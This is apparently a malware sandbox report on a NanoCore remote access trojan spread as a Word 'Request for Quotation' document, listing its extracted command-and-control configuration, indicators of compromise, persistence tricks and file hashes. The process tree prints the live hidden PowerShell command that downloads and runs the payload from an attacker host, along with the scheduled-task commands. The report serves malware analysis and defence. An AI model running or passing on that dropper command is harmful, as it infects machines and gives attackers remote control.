nanocore | 153d0278268d1ba4248fcc47b93d6098c023c22ae0148e570e5f97810ae1dc4a

Analysis

max time kernel
139s
max time network
151s
platform
windows7_x64
resource
win7v20210410
submitted
19-04-2021 23:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

180421 PDA Request for Quotation.doc
Size

295KB
MD5

dbecba4a6211aba561e0d36f9db4b1d2
SHA1

f808acedb937fcf07cd2b2c801a84cf290272b65
SHA256

153d0278268d1ba4248fcc47b93d6098c023c22ae0148e570e5f97810ae1dc4a
SHA512

a3217a7c1b41cbf262c3b31e296244abb602a5fede6b402efde3f949df65ac29fea3a316b1ef7ebd6e6c121ff0a959129b62569261a15db895500e81fe0d693e

Score

10^/10

nanocore evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

httP://twart.myfirewall.org/taskmgrs.exe

Extracted

Family

nanocore

Version

1.2.2.0

cloudhost.myfirewall.org:5456

Mutex

526138e5-5494-46e7-98ba-5b4a5e1d307b

Attributes

activate_away_mode
true
backup_connection_host
cloudhost.myfirewall.org
backup_dns_server
cloudhost.myfirewall.org
buffer_size
65535
build_time
2021-01-30T00:19:04.422535736Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
5456
default_group
saviour
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
526138e5-5494-46e7-98ba-5b4a5e1d307b
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
cloudhost.myfirewall.org
primary_dns_server
cloudhost.myfirewall.org
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Signatures

NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	468	2036	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1784	2036	powershell.exe	WINWORD.EXE
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process	1616	2036	powershell.exe	WINWORD.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 468 powershell.exe
Executes dropped EXE 8 IoCs

Processes:

taskmgrs.exetaskmgrs.exetaskmgrs.exetaskmgrs.exetaskmgrs.exetaskmgrs.exetaskmgrs.exetaskmgrs.exe

pid process

1340 taskmgrs.exe
1124 taskmgrs.exe
1716 taskmgrs.exe
616 taskmgrs.exe
1648 taskmgrs.exe
1660 taskmgrs.exe
1632 taskmgrs.exe
1624 taskmgrs.exe
Deletes itself 1 IoCs

Processes:

WINWORD.EXE

pid process

2036 WINWORD.EXE
Loads dropped DLL 1 IoCs

Processes:

powershell.exe

pid process

468 powershell.exe

flow	pid	process
7	468	powershell.exe

pid	process
1340	taskmgrs.exe
1124	taskmgrs.exe
1716	taskmgrs.exe
616	taskmgrs.exe
1648	taskmgrs.exe
1660	taskmgrs.exe
1632	taskmgrs.exe
1624	taskmgrs.exe

pid	process
2036	WINWORD.EXE

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

taskmgrs.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\LAN Host = "C:\\Program Files (x86)\\LAN Host\\lanhost.exe"	taskmgrs.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

taskmgrs.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA taskmgrs.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	taskmgrs.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

taskmgrs.exetaskmgrs.exetaskmgrs.exe

description	pid	process	target process
PID 1340 set thread context of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1124 set thread context of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1716 set thread context of 1632	1716	taskmgrs.exe	taskmgrs.exe

Drops file in Program Files directory 2 IoCs

Processes:

taskmgrs.exe

description	ioc	process
File created	C:\Program Files (x86)\LAN Host\lanhost.exe	taskmgrs.exe
File opened for modification	C:\Program Files (x86)\LAN Host\lanhost.exe	taskmgrs.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

952 schtasks.exe
932 schtasks.exe

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
952	schtasks.exe
932	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE

NTFS ADS 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp\:Zone.Identifier:$DATA WINWORD.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

2036 WINWORD.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\~WRD0000.tmp\:Zone.Identifier:$DATA	WINWORD.EXE

pid	process
2036	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskmgrs.exetaskmgrs.exetaskmgrs.exe

pid	process
468	powershell.exe
468	powershell.exe
1784	powershell.exe
1616	powershell.exe
1784	powershell.exe
1616	powershell.exe
1124	taskmgrs.exe
1124	taskmgrs.exe
1716	taskmgrs.exe
1716	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe
1624	taskmgrs.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgrs.exe

pid process

1624 taskmgrs.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

WINWORD.EXE

pid process

2036 WINWORD.EXE

pid	process
1624	taskmgrs.exe

pid	process
2036	WINWORD.EXE

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exetaskmgrs.exetaskmgrs.exetaskmgrs.exe

description	pid	process
Token: SeDebugPrivilege	468	powershell.exe
Token: SeDebugPrivilege	1784	powershell.exe
Token: SeDebugPrivilege	1616	powershell.exe
Token: SeDebugPrivilege	1124	taskmgrs.exe
Token: SeDebugPrivilege	1716	taskmgrs.exe
Token: SeDebugPrivilege	1624	taskmgrs.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

2036 WINWORD.EXE
2036 WINWORD.EXE
2036 WINWORD.EXE
2036 WINWORD.EXE

pid	process
2036	WINWORD.EXE
2036	WINWORD.EXE
2036	WINWORD.EXE
2036	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WINWORD.EXEpowershell.exepowershell.exepowershell.exetaskmgrs.exetaskmgrs.exetaskmgrs.exetaskmgrs.exe

description	pid	process	target process
PID 2036 wrote to memory of 468	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 468	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 468	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 468	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1784	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1784	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1784	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1784	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1616	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1616	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1616	2036	WINWORD.EXE	powershell.exe
PID 2036 wrote to memory of 1616	2036	WINWORD.EXE	powershell.exe
PID 468 wrote to memory of 1340	468	powershell.exe	taskmgrs.exe
PID 468 wrote to memory of 1340	468	powershell.exe	taskmgrs.exe
PID 468 wrote to memory of 1340	468	powershell.exe	taskmgrs.exe
PID 468 wrote to memory of 1340	468	powershell.exe	taskmgrs.exe
PID 1784 wrote to memory of 1716	1784	powershell.exe	taskmgrs.exe
PID 1784 wrote to memory of 1716	1784	powershell.exe	taskmgrs.exe
PID 1784 wrote to memory of 1716	1784	powershell.exe	taskmgrs.exe
PID 1784 wrote to memory of 1716	1784	powershell.exe	taskmgrs.exe
PID 1616 wrote to memory of 1124	1616	powershell.exe	taskmgrs.exe
PID 1616 wrote to memory of 1124	1616	powershell.exe	taskmgrs.exe
PID 1616 wrote to memory of 1124	1616	powershell.exe	taskmgrs.exe
PID 1616 wrote to memory of 1124	1616	powershell.exe	taskmgrs.exe
PID 2036 wrote to memory of 1188	2036	WINWORD.EXE	splwow64.exe
PID 2036 wrote to memory of 1188	2036	WINWORD.EXE	splwow64.exe
PID 2036 wrote to memory of 1188	2036	WINWORD.EXE	splwow64.exe
PID 2036 wrote to memory of 1188	2036	WINWORD.EXE	splwow64.exe
PID 1716 wrote to memory of 1660	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1660	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1660	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1660	1716	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1340 wrote to memory of 1648	1340	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 616	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 616	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 616	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 616	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1124 wrote to memory of 1624	1124	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1716 wrote to memory of 1632	1716	taskmgrs.exe	taskmgrs.exe
PID 1624 wrote to memory of 952	1624	taskmgrs.exe	schtasks.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\180421 PDA Request for Quotation.doc"
1⤵
- Deletes itself
- Drops file in Windows directory
- Modifies Internet Explorer settings
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2036

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/taskmgrs.exe','C:\Users\Admin\AppData\Roaming\taskmgrs.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\taskmgrs.exe'"
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:468

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"C:\Users\Admin\AppData\Roaming\taskmgrs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1340

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"{path}"
4⤵
- Executes dropped EXE
PID:1648

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/taskmgrs.exe','C:\Users\Admin\AppData\Roaming\taskmgrs.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\taskmgrs.exe'"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1784

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"C:\Users\Admin\AppData\Roaming\taskmgrs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1716

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"{path}"
4⤵
- Executes dropped EXE
PID:1660

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"{path}"
4⤵
- Executes dropped EXE
PID:1632

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://twart.myfirewall.org/taskmgrs.exe','C:\Users\Admin\AppData\Roaming\taskmgrs.exe');Start-Process 'C:\Users\Admin\AppData\Roaming\taskmgrs.exe'"
2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1616

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"C:\Users\Admin\AppData\Roaming\taskmgrs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1124

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"{path}"
4⤵
- Executes dropped EXE
PID:616

C:\Users\Admin\AppData\Roaming\taskmgrs.exe
"{path}"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "LAN Host" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF8EF.tmp"
5⤵
- Creates scheduled task(s)
PID:952

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /f /tn "LAN Host Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpF9BB.tmp"
5⤵
- Creates scheduled task(s)
PID:932

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1188

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248ba
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295b
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eeb
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
164e67ce44c70127eefa6bac32afd47c

SHA1
87aba1f816c096d397f3c198de37ddd0206112dc

SHA256
0de5c8325dbfa6ac0b4d01917379a1a6bd179e2b4e67f613fe630f5ed62e82be

SHA512
1e7c4e0f915491e3187e8b5f489fa8b668697b001deb42d6a77d970a60c37d49c5252465d4b6f662ba45b475f3184840ffa0fafab08954aa84a6c8a6eb119751

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF8EF.tmp
MD5
7b1135bfca0a22d7a6314f3f71de24c4

SHA1
0a08d3cd94d878153ec57108c03200ace88245b3

SHA256
b194ff0daf8921a3bd068453afbc088e8e4f2c05aade69b9e40e118dd2fadcb7

SHA512
31629a6f9501bf3fe5a21323b40f648215ba8696c421747e0cd6828617f44c2c593236cbf6574946fc1e2f89287196796140b10ca34cfe3ead27c5e880ede1c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF9BB.tmp
MD5
54865f98871478b2b88b7f8aa6100915

SHA1
6f8667f1ce25cebee2a7b460668736ff6bcfac54

SHA256
287f7b4372926ff59bb9a14bdfc00ad63f92af8efdb2e14f6f6baf31878fd44e

SHA512
